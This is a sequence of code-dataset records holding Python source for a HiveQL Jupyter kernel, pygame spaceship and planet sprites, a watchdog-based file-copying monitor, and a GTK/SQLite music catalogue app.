self.send_response(self.iopub_socket, 'stream', {\n 'name': 'stdout',\n 'text': str(contents)\n })\n\n def create_conn(self, url, **kwargs):\n self.send_info(\"create_engine('\" + url + \"', \" + ', '.join(\n [str(k) + '=' + (str(v) if type(v) == str else json.dumps(v)) for k, v in kwargs.items()]) + \")\\n\")\n self.last_conn = create_engine(url, **kwargs)\n self.last_conn.connect()\n self.send_info(\"Connection established to database!\\n\")\n\n def reconfigure(self, params):\n if 'default_limit' in params:\n try:\n self.params['default_limit'] = int(params['default_limit'])\n self.send_info(\"Set display limit to {}\\n\".format(self.params['default_limit']))\n except ValueError as e:\n self.send_exception(e)\n if 'display_mode' in params:\n v = params['display_mode']\n if type(v) == str and v in ['b', 'e', 'be']:\n self.params['display_mode'] = v\n else:\n self.send_error(\"Invalid display_mode, options are b, e and be.\")\n\n def parse_code(self, code):\n req = code.strip()\n\n headers = {}\n sql_req = \"\"\n beginning = True\n for l in req.split('\\n'):\n l = l.strip()\n if l.startswith(\"$$\"):\n if beginning:\n k, v = l.replace(\"$\", \"\").split(\"=\")\n k, v = k.strip(), v.strip()\n if v.startswith('{'):\n v = json.loads(v)\n else:\n try:\n v = int(v)\n except ValueError:\n pass\n headers[k] = v\n else:\n raise KernelSyntaxError(\"Headers starting with %% must be at the beginning of your request.\")\n else:\n beginning = False\n if not l.startswith(\"--\"):\n sql_req += ' ' + l\n\n if self.last_conn is None and not headers and self.conf is not None:\n headers = self.conf # if cells doesn't contain $$ and connection is None, overriding headers with conf data\n\n sql_req = sql_req.strip()\n if sql_req.endswith(';'):\n sql_req = sql_req[:-1]\n\n a = ['default_limit', 'display_mode']\n params, pyhiveconf = {k: v for k, v in headers.items() if k in a}, {k: v for k, v in headers.items() if k not in a}\n\n self.reconfigure(params)\n\n return pyhiveconf, sql_req\n\n def do_execute(self, code, silent, store_history=True, user_expressions=None, allow_stdin=False):\n try:\n pyhiveconf, sql_req = self.parse_code(code)\n\n if 'url' in pyhiveconf:\n self.create_conn(**pyhiveconf)\n\n if self.last_conn is None:\n raise ConnectionNotCreated()\n\n # If code empty\n if not sql_req:\n return {\n 'status': 'ok',\n 'execution_count': self.execution_count,\n 'payload': [],\n 'user_expressions': {}\n }\n sql_req = sql_remove_comment(sql_req)\n sql_validate(sql_req)\n sql_str = sql_rewrite(sql_req, self.params['default_limit'])\n logger.info(\"Running the following HiveQL query: {}\".format(sql_req))\n\n pd.set_option('display.max_colwidth', -1)\n if sql_is_create(sql_req):\n self.last_conn.execute(sql_str)\n self.send_info(\"Table created!\")\n return { 'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {} }\n if sql_is_drop(sql_req):\n self.last_conn.execute(sql_str)\n self.send_info(\"Table dropped!\")\n return { 'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {} }\n if sql_is_use(sql_req):\n self.last_conn.execute(sql_str)\n self.send_info(\"Database changed!\")\n return { 'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {} }\n if sql_is_set_variable(sql_req):\n for s in sql_req.split(\";\"):\n self.last_conn.execute(s.strip())\n self.send_info(\"variables set!\")\n return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}}\n\n df 
= pd.read_sql(sql_str, self.last_conn)\n if sql_is_show(sql_req):\n if sql_is_show_tables(sql_req):\n html = df_to_html(df[df.tab_name.str.contains( extract_show_pattern(sql_req))])\n if sql_is_show_databases(sql_req):\n html = df_to_html(df[df.database_name.str.contains( extract_show_pattern(sql_req))])\n else:\n html = df_to_html(df)\n\n except OperationalError as oe:\n return self.send_error(oe)\n except ResourceClosedError as rce:\n return self.send_error(rce)\n except MultipleQueriesError as e:\n return self.send_error(\"Only one query per cell!\")\n except NotAllowedQueriesError as e:\n return self.send_error(\"only 'select', 'with', 'set property=value', 'create table x.y stored as orc' 'drop table', 'use database', 'show databases', 'show tables', 'describe myTable' statements are allowed\")\n except Exception as e:\n return self.send_exception(e)\n\n # msg_types = https://jupyter-client.readthedocs.io/en/latest/messaging.html?highlight=stream#messages-on-the-iopub-pub-sub-channel\n self.send_response(self.iopub_socket, 'execute_result', {\n \"execution_count\": self.execution_count,\n 'data': {\n \"text/html\": html,\n },\n \"metadata\": {\n \"image/png\": {\n \"width\": 640,\n \"height\": 480,\n },\n }\n })\n\n return {\n 'status': 'ok',\n 'execution_count': self.execution_count,\n 'payload': [],\n 'user_expressions': {}\n }\ndef df_to_html(df):\n #for column in df:\n # if df[column].dtype == 'object':\n # df[column] = df[column].apply(lambda x: x.replace(\"\\n\",\"
\"))\n return df.fillna('NULL').astype(str).to_html(notebook=True)\n\n", "sub_path": "hiveql/kernel.py", "file_name": "kernel.py", "file_ext": "py", "file_size_in_byte": 9107, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 17, "usage_type": "attribute"}, {"api_name": "ipykernel.kernelbase.Kernel", "line_number": 52, "usage_type": "name"}, {"api_name": "constants.KERNEL_NAME", "line_number": 53, "usage_type": "name"}, {"api_name": "constants.__version__", "line_number": 54, "usage_type": "name"}, {"api_name": "os.path.path.expanduser", "line_number": 70, "usage_type": "call"}, {"api_name": "constants.CONFIG_FILE", "line_number": 70, "usage_type": "argument"}, {"api_name": "os.path.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 70, "usage_type": "name"}, {"api_name": "os.path.path.isfile", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 71, "usage_type": "name"}, {"api_name": "json.load", "line_number": 73, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 79, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 102, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 134, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 185, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 204, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.OperationalError", "line_number": 213, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.ResourceClosedError", "line_number": 215, "usage_type": "name"}]} +{"seq_id": "296288927", "text": "import pygame, math\nfrom settings import *\nimport random\n\nclass Spaceship(pygame.sprite.Sprite):\n def __init__(self, game, x, y):\n self.groups = game.all_sprites\n # you can do this in python 3\n super().__init__(self.groups)\n self.game = game\n self.image = pygame.transform.scale(game.player_img, (50, 40))\n # this ori_img is for the rotate rendering if i directly change image from rotated image something weird happen\n self.ori_img = self.image\n self.rect = self.image.get_rect()\n self.vel = pygame.math.Vector2(0, 0)\n self.pos = pygame.math.Vector2(x, y)\n self.rot = 0\n\n def get_keys(self):\n self.rot_speed = 0\n # 마찰력\n self.vel *= 0.996\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT]:\n self.rot_speed = ROT_SPEED\n if keys[pygame.K_RIGHT]:\n self.rot_speed = -ROT_SPEED\n if keys[pygame.K_UP]:\n max = pygame.math.Vector2(MAX_SPEED, 0).rotate(-self.rot-90)\n if self.vel.length() > max.length() :\n self.vel.scale_to_length(MAX_SPEED)\n else:\n self.vel += pygame.math.Vector2(ACC, 0).rotate(-self.rot-90)\n #self.vel += pygame.math.Vector2(ACC, 0).rotate(-self.rot-90)\n if keys[pygame.K_DOWN]:\n self.vel += pygame.math.Vector2(-ACC / 3, 0).rotate(-self.rot-90)\n\n def update(self):\n self.get_keys()\n self.rot = (self.rot + self.rot_speed * self.game.dt) % 360\n self.image = pygame.transform.rotozoom(self.ori_img, self.rot, 1)\n self.rect = self.image.get_rect()\n self.pos += self.vel * self.game.dt\n self.rect.center = self.pos\n\nclass Planet(pygame.sprite.Sprite):\n def __init__(self, game, image, x, y, rot_speed, width, height):\n # too much things to optimize here..\n self.groups = game.all_sprites\n 
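# A minimal sketch of the "$$ key=value" header convention the HiveQL kernel
# record above parses in parse_code(): leading $$ lines carry connection
# settings, the remainder is treated as the SQL body. `split_headers` is a
# hypothetical name, not the kernel's API.
import json

def split_headers(cell):
    headers, sql_parts = {}, []
    for line in cell.strip().splitlines():
        line = line.strip()
        if line.startswith("$$") and not sql_parts:      # headers must lead
            key, value = line.lstrip("$ ").split("=", 1)
            try:
                value = json.loads(value.strip())        # ints and {...} dicts
            except ValueError:
                value = value.strip()                    # plain strings (URLs)
            headers[key.strip()] = value
        elif not line.startswith("--"):                  # drop SQL comments
            sql_parts.append(line)
    return headers, " ".join(sql_parts).strip().rstrip(";")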
super().__init__(self.groups)\n self.game = game\n self.image = pygame.transform.scale(image, (width, height))\n self.ori_img = self.image\n self.rect = self.image.get_rect()\n self.rect.centerx = x\n self.rect.centery = y\n self.rot = 0\n self.rot_speed = rot_speed\n self.pos = pygame.math.Vector2(x, y)\n\n def update(self):\n self.ori_rect = self.rect\n self.rot = (self.rot + self.rot_speed * self.game.dt) % 360\n self.image = pygame.transform.rotate(self.ori_img, self.rot)\n self.rect = self.image.get_rect()\n self.rect.center = self.ori_rect.center\n\nclass Planet_orbit(pygame.sprite.Sprite):\n # planet that orbit to other planet\n def __init__(self, game, image, rot_speed, width, height, orbit_to, orbit_speed, distance_to, theta):\n # too much things to optimize here..\n self.groups = game.all_sprites\n super().__init__(self.groups)\n self.game = game\n self.image = pygame.transform.scale(image, (width, height))\n self.ori_img = self.image\n self.rect = self.image.get_rect()\n self.rot = 0\n self.rot_speed = rot_speed\n self.orbit_to = orbit_to\n self.orbit_speed = orbit_speed\n self.radius = distance_to\n self.theta = theta\n\n def update(self):\n self.ori_rect = self.rect\n self.rot = (self.rot + self.rot_speed * self.game.dt) % 360\n self.image = pygame.transform.rotate(self.ori_img, self.rot)\n self.rect = self.image.get_rect()\n self.rect.center = self.ori_rect.center\n\n # this code use 삼각함수 to get next x and y position of circle movement\n x = self.radius * math.cos(self.theta) + self.orbit_to.rect.centerx\n y = self.radius * math.sin(self.theta) + self.orbit_to.rect.centery\n self.rect.centerx = x\n self.rect.centery = y\n # have to change theta (angle of trangle to orbit planet)\n self.theta = (self.theta + self.orbit_speed * self.game.dt) % 360\n", "sub_path": "Pygame_Project_Examples/Spacecraft-master/sprites.py", "file_name": "sprites.py", "file_ext": "py", "file_size_in_byte": 3961, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pygame.sprite", "line_number": 5, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 29, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pygame.transform.rotozoom", 
"line_number": 41, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 52, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 59, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 59, "usage_type": "attribute"}, {"api_name": "pygame.transform.rotate", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 68, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 75, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pygame.transform.rotate", "line_number": 88, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 88, "usage_type": "attribute"}, {"api_name": "math.cos", "line_number": 93, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 94, "usage_type": "call"}]} +{"seq_id": "534998776", "text": "# -*- coding: euc-kr -*-\r\n\r\nimport time, os, datetime, configparser, shutil\r\nfrom watchdog.observers import Observer\r\nfrom watchdog.events import FileSystemEventHandler\r\n\r\nclass MyHandler(FileSystemEventHandler):\r\n target_file_types = []\r\n cp_dir_src = \".\"\r\n cp_dir_dest = \".\"\r\n\r\n def __init__(self, a, b, c):\r\n target_file_types, cp_dir_src, cp_dir_dest = a, b, c\r\n print(\"-------Event Handler Start!!----------\")\r\n\r\n def on_modified(self, event):\r\n print(\"[+] Files are Modified in the Target Folder !!!\")\r\n print(\" L___\", event.event_type, event.src_path)\r\n\r\n self.do_action(event)\r\n\r\n def on_created(self, event):\r\n print(\"[+] Files are Created in the Target Folder !!!\")\r\n print(\" L___\", event.event_type, event.src_path)\r\n\r\n self.do_action(event)\r\n\r\n def get_current_time(self):\r\n ts_rule = \"%Y-%m-%d %H-%M-%S\"\r\n ts = time.time()\r\n st = datetime.datetime.fromtimestamp(ts).strftime(ts_rule)\r\n return st\r\n\r\n def get_fileinfo_from_fullpath(self, full_path):\r\n file_path, file_ext = os.path.splitext(full_path)\r\n file_name = os.path.basename(full_path)\r\n return file_path, file_name, file_ext\r\n\r\n def copy_file(self, src, dest_dir):\r\n str_time = self.get_current_time()\r\n dest_dir = dest_dir + '/' + str_time\r\n\r\n file_path, file_ext = os.path.splitext(src)\r\n file_name = os.path.basename(src)\r\n dest_path = dest_dir + '/' + file_name\r\n\r\n if not os.path.isdir(dest_dir):\r\n try:\r\n os.mkdir(dest_dir)\r\n except:\r\n os.mkdir('/'.join(dest_dir.split('/')[:-1]))\r\n os.mkdir(dest_dir)\r\n\r\n shutil.copyfile(src, dest_path)\r\n\r\n def do_action(self, event):\r\n file_path, file_name, file_ext = self.get_fileinfo_from_fullpath(event.src_path)\r\n print(\" L___path:%s, name:%s, ext:%s\\n\" % (file_path, file_name, file_ext))\r\n\r\n for ext in target_file_types:\r\n if ext == file_ext[1:]:\r\n print(' [+] type:%s, Infected !! Copying info.' 
% ext)\r\n try:\r\n self.copy_file(event.src_path, cp_dir_dest)\r\n except:\r\n temp = event.src_path.split('\\\\')\r\n temp[0] += '_copy/' + self.get_current_time()\r\n temp = (\"/\".join(temp))\r\n os.mkdir(temp)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n config = configparser.RawConfigParser()\r\n config.read('filemon.cfg')\r\n\r\n target_dir = config.get('Basic_Config', 'target_dir')\r\n temp_target_file_types = config.get('Basic_Config', 'target_file_types')\r\n cp_dir_src = config.get('Basic_Config', 'copy_src_dir')\r\n cp_dir_dest = config.get('Basic_Config', 'copy_dest_dir')\r\n target_file_types = temp_target_file_types.split(\"|\")\r\n\r\n print (\"Monitoring Start - target_dir : %s\" % target_dir)\r\n print (\"target_file_type : %s\" % target_file_types[0])\r\n\r\n event_handler = MyHandler(target_file_types, cp_dir_src, cp_dir_dest)\r\n\r\n observer = Observer()\r\n observer.schedule(event_handler, path=target_dir, recursive=False)\r\n observer.start()\r\n\r\n try:\r\n while True:\r\n time.sleep(1)\r\n except KeyboardInterrupt:\r\n observer.stop()\r\n observer.join()\r\n", "sub_path": "monitor_1.py", "file_name": "monitor_1.py", "file_ext": "py", "file_size_in_byte": 3335, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "watchdog.events.FileSystemEventHandler", "line_number": 7, "usage_type": "name"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 49, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 51, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 52, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 54, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 69, "usage_type": "call"}, {"api_name": "configparser.RawConfigParser", "line_number": 73, "usage_type": "call"}, {"api_name": "watchdog.observers.Observer", "line_number": 87, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 93, "usage_type": "call"}]} +{"seq_id": "503407162", "text": "import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\nimport sqlite3\n\n\nclass Music(Gtk.Window):\n def __init__(self):\n Gtk.Window.__init__(self, title = \"Music\")\n\n self.art = []\n self.alb = []\n self.tra = []\n\n self.set_default_size(800,600)\n self.grid = Gtk.Grid()\n self.grid.set_row_spacing(10)\n self.grid.set_column_spacing(10)\n self.add(self.grid)\n\n self.hb = Gtk.HeaderBar()\n self.hb.set_show_close_button(True)\n self.hb.props.title = \"Records\"\n self.set_titlebar(self.hb)\n\n self.artists = Gtk.Box(spacing 
= 5)\n self.artists.set_size_request(50,50)\n self.grid.add(self.artists)\n self.load_artists()\n\n self.albums = Gtk.ListBox()\n self.grid.attach_next_to(self.albums, self.artists, Gtk.PositionType.BOTTOM,40,50)\n\n self.tracks = Gtk.ListBox()\n self.grid.attach_next_to(self.tracks, self.albums, Gtk.PositionType.RIGHT, 40,50)\n\n\n buttadd = Gtk.Button(label = \"+\")\n buttadd.connect(\"clicked\", self.newcd)\n self.hb.pack_end(buttadd)\n\n buttdel = Gtk.Button(label = \"-\")\n buttdel.connect(\"clicked\", self.delete)\n self.hb.pack_end(buttdel)\n\n buttupdate = Gtk.Button(label = \"Update\")\n buttupdate.connect(\"clicked\", self.update)\n self.hb.pack_end(buttupdate)\n\n buttrent = Gtk.Button(label = \"Rent\")\n buttrent.connect(\"clicked\", self.rent)\n self.hb.pack_end(buttrent)\n\n buttsearch = Gtk.Button(label = \"Search\")\n buttsearch.connect(\"clicked\", self.search)\n self.hb.pack_end(buttsearch)\n\n self.entrysearch = Gtk.Entry()\n self.hb.pack_end(self.entrysearch)\n\n def add_(self, widget):\n addArtysta = self.entry1.get_text()\n addAlbum = self.entry2.get_text()\n addTracks = self.entry3.get_text()\n\n self.cur.execute('INSERT INTO artysta(nazwa) VALUES(?)', (addArtysta,))\n self.cur.execute('INSERT INTO album(nazwa, art) VALUES(?, ?)', (addAlbum, addArtysta,))\n self.cur.execute('INSERT INTO track(tr, nazwa, art) VALUES(?, ?, ?)', (addTracks, addAlbum, addTracks,))\n self.c.commit()\n self.cur.execute('SELECT * FROM artysta')\n ex = self.cur.fetchall()\n bu = Gtk.Button(label = addArtysta)\n bu.connect(\"clicked\", self.load_albums)\n self.artists.add(bu)\n self.show_all()\n\n def load_artists(self):\n self.c = sqlite3.connect('base.db')\n self.c.row_factory = sqlite3.Row\n self.cur = self.c.cursor()\n\n self.cur.execute(\"CREATE TABLE IF NOT EXISTS artysta(nazwa TEXT)\" )\n self.cur.execute(\"CREATE TABLE IF NOT EXISTS album(nazwa TEXT, art TEXT, FOREIGN KEY(art) REFERENCES artysta(nazwa))\" )\n self.cur.execute(\"CREATE TABLE IF NOT EXISTS track(tr TEXT, nazwa TEXT, art TEXT, FOREIGN KEY(art) REFERENCES artysta(nazwa), FOREIGN KEY(nazwa) REFERENCES album(nazwa))\" )\n\n self.c.commit()\n self.cur.execute('SELECT * FROM artysta')\n artists_list = self.cur.fetchall()\n\n for artist_ in artists_list:\n b = Gtk.Button(label = artist_['nazwa'])\n b.connect(\"clicked\", self.load_albums)\n self.art.append(b)\n\n for i in (self.art):\n self.artists.pack_start(i, True, True, 0)\n self.show_all()\n\n def load_albums(self, widget):\n self.albums = Gtk.ListBox()\n self.grid.attach_next_to(self.albums, self.artists, Gtk.PositionType.BOTTOM,30,50)\n self.tracks = Gtk.ListBox()\n self.grid.attach_next_to(self.tracks, self.albums, Gtk.PositionType.RIGHT, 50,50)\n self.cur.execute('SELECT * FROM album WHERE art = ?', (widget.get_label(), ))\n albums_list = self.cur.fetchall()\n for album_ in albums_list:\n b2 = Gtk.Button(label = album_['nazwa'])\n b2.connect(\"clicked\", self.load_tracks)\n self.albums.add(b2)\n self.show_all()\n\n def load_tracks(self, widget):\n self.tracks = Gtk.ListBox()\n self.grid.attach_next_to(self.tracks, self.albums, Gtk.PositionType.RIGHT, 50,50)\n self.cur.execute('SELECT * FROM track WHERE nazwa = ? 
', (widget.get_label(), ))\n tracks_list = self.cur.fetchall()\n for track_ in tracks_list:\n l = Gtk.Label(track_['tr'])\n self.tracks.add(l)\n self.show_all()\n\n def newcd(self, widget):\n window2 = CDadd()\n window2.show_all()\n self.show_all()\n\n def delete(self, widget):\n window3 = CDdelete()\n window3.show_all()\n self.show_all()\n\n def update(self, widget):\n window4 = CDupdate()\n window4.show_all()\n self.show_all()\n\n def rent(self, widget):\n window4 = CDrent()\n window4.show_all()\n self.show_all()\n\n def search(self, widget):\n self.albums = Gtk.ListBox()\n self.grid.attach_next_to(self.albums, self.artists, Gtk.PositionType.BOTTOM,30,50)\n self.tracks = Gtk.ListBox()\n self.grid.attach_next_to(self.tracks, self.albums, Gtk.PositionType.RIGHT, 50,50)\n self.cur.execute('SELECT * FROM album WHERE nazwa = ?', (self.entrysearch.get_text(), ))\n albums_list = self.cur.fetchall()\n for album_ in albums_list:\n b2 = Gtk.Button(label = album_['nazwa'])\n b2.connect(\"clicked\", self.load_tracks)\n self.albums.add(b2)\n self.show_all()\n\nclass CDadd(Gtk.Window):\n def __init__(self):\n\n Gtk.Window.__init__(self, title = \"Add\")\n\n self.set_default_size(200,300)\n self.grid = Gtk.Grid()\n self.grid.set_row_spacing(2)\n self.grid.set_column_spacing(2)\n self.add(self.grid)\n\n self.entry1 = Gtk.Entry()\n self.entry2 = Gtk.Entry()\n self.entry3 = Gtk.Entry()\n\n self.grid.attach(self.entry1,0,0,20,20)\n self.grid.attach_next_to(self.entry2, self.entry1, Gtk.PositionType.BOTTOM, 20, 20)\n self.grid.attach_next_to(self.entry3, self.entry2, Gtk.PositionType.BOTTOM, 20, 20)\n\n addbut = Gtk.Button(label = \"Add\")\n addbut.connect(\"clicked\", self.add_)\n self.grid.attach_next_to(addbut, self.entry3, Gtk.PositionType.BOTTOM, 20, 20)\n\n def add_(self, widget):\n\n self.c = sqlite3.connect('base.db')\n self.c.row_factory = sqlite3.Row\n self.cur = self.c.cursor()\n\n addArtysta = self.entry1.get_text()\n addAlbum = self.entry2.get_text()\n self.cur.execute('SELECT * FROM artysta WHERE nazwa = ? 
', (addArtysta, ))\n a = self.cur.fetchall()\n if len(a) == 0:\n self.cur.execute('INSERT INTO artysta(nazwa) VALUES(?)', (addArtysta,))\n self.cur.execute('INSERT INTO album(nazwa, art) VALUES(?, ?)', (addAlbum, addArtysta,))\n\n addTracks = self.entry3.get_text()\n addTracks_list = addTracks.split(\"-\")\n for i in addTracks_list:\n self.cur.execute('INSERT INTO track(tr, nazwa, art) VALUES(?, ?, ?)', (i, addAlbum, addArtysta,))\n self.c.commit()\n\nclass CDdelete(Gtk.Window):\n def __init__(self):\n\n Gtk.Window.__init__(self, title = \"Delete\")\n\n self.set_default_size(100,100)\n self.grid = Gtk.Grid()\n self.grid.set_row_spacing(2)\n self.grid.set_column_spacing(2)\n self.add(self.grid)\n\n self.entry1 = Gtk.Entry()\n\n self.grid.add(self.entry1)\n\n addbut = Gtk.Button(label = \"Delete\")\n addbut.connect(\"clicked\", self.del_)\n self.grid.attach_next_to(addbut, self.entry1, Gtk.PositionType.BOTTOM, 20, 20)\n\n def del_(self, widget):\n\n self.c = sqlite3.connect('base.db')\n self.c.row_factory = sqlite3.Row\n self.cur = self.c.cursor()\n\n delAlbum = self.entry1.get_text()\n self.cur.execute('DELETE FROM track WHERE nazwa=?', (delAlbum,))\n self.cur.execute('DELETE FROM album WHERE nazwa=?', (delAlbum,))\n self.c.commit()\n\nclass CDupdate(Gtk.Window):\n def __init__(self):\n\n Gtk.Window.__init__(self, title = \"Delete\")\n\n self.set_default_size(200,200)\n self.grid = Gtk.Grid()\n self.grid.set_row_spacing(2)\n self.grid.set_column_spacing(2)\n self.add(self.grid)\n\n self.entry1 = Gtk.Entry()\n self.entry2 = Gtk.Entry()\n self.grid.attach(self.entry1,0,0,20,20)\n self.grid.attach_next_to(self.entry2,self.entry1, Gtk.PositionType.BOTTOM,20,20)\n\n addbut = Gtk.Button(label = \"Update\")\n addbut.connect(\"clicked\", self.update_)\n self.grid.attach_next_to(addbut, self.entry2, Gtk.PositionType.BOTTOM, 20, 20)\n\n def update_(self, widget):\n\n self.c = sqlite3.connect('base.db')\n self.c.row_factory = sqlite3.Row\n self.cur = self.c.cursor()\n\n updateAlbum = self.entry1.get_text()\n updateAlbumT = self.entry2.get_text()\n self.cur.execute('UPDATE track SET nazwa=? WHERE nazwa=?', (updateAlbumT, updateAlbum,))\n self.cur.execute('UPDATE album SET nazwa=? WHERE nazwa=?', (updateAlbumT, updateAlbum,))\n self.c.commit()\n\nclass CDrent(Gtk.Window):\n def __init__(self):\n\n Gtk.Window.__init__(self, title = \"Rent\")\n\n self.set_default_size(200,200)\n self.grid = Gtk.Grid()\n self.grid.set_row_spacing(2)\n self.grid.set_column_spacing(2)\n self.add(self.grid)\n\n self.entry1 = Gtk.Entry()\n self.grid.attach(self.entry1,0,0,20,20)\n\n addbut = Gtk.Button(label = \"Update\")\n addbut.connect(\"clicked\", self.rent_)\n self.grid.attach_next_to(addbut, self.entry1, Gtk.PositionType.BOTTOM, 20, 20)\n\n def rent_(self, widget):\n\n self.c = sqlite3.connect('base.db')\n self.c.row_factory = sqlite3.Row\n self.cur = self.c.cursor()\n\n updateAlbum = self.entry1.get_text()\n updateAlbumT = updateAlbum + \"(wypozyczone)\"\n self.cur.execute('UPDATE track SET nazwa=? WHERE nazwa=?', (updateAlbumT, updateAlbum,))\n self.cur.execute('UPDATE album SET nazwa=? 
WHERE nazwa=?', (updateAlbumT, updateAlbum,))\n self.c.commit()\n\nwindow = Music()\nwindow.connect(\"delete-event\", Gtk.main_quit)\nwindow.show_all()\nGtk.main()\n", "sub_path": "Python Rozszerzony/L8/PRL8Z2.py", "file_name": "PRL8Z2.py", "file_ext": "py", "file_size_in_byte": 10195, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "gi.require_version", "line_number": 2, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 8, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 8, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Window.__init__", "line_number": 10, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 10, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 10, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Grid", "line_number": 17, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 17, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.HeaderBar", "line_number": 22, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 22, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Box", "line_number": 27, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 27, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ListBox", "line_number": 32, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 32, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 33, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 33, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ListBox", "line_number": 35, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 35, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 36, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 36, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 39, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 39, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 43, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 43, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 47, "usage_type": "call"}, {"api_name": 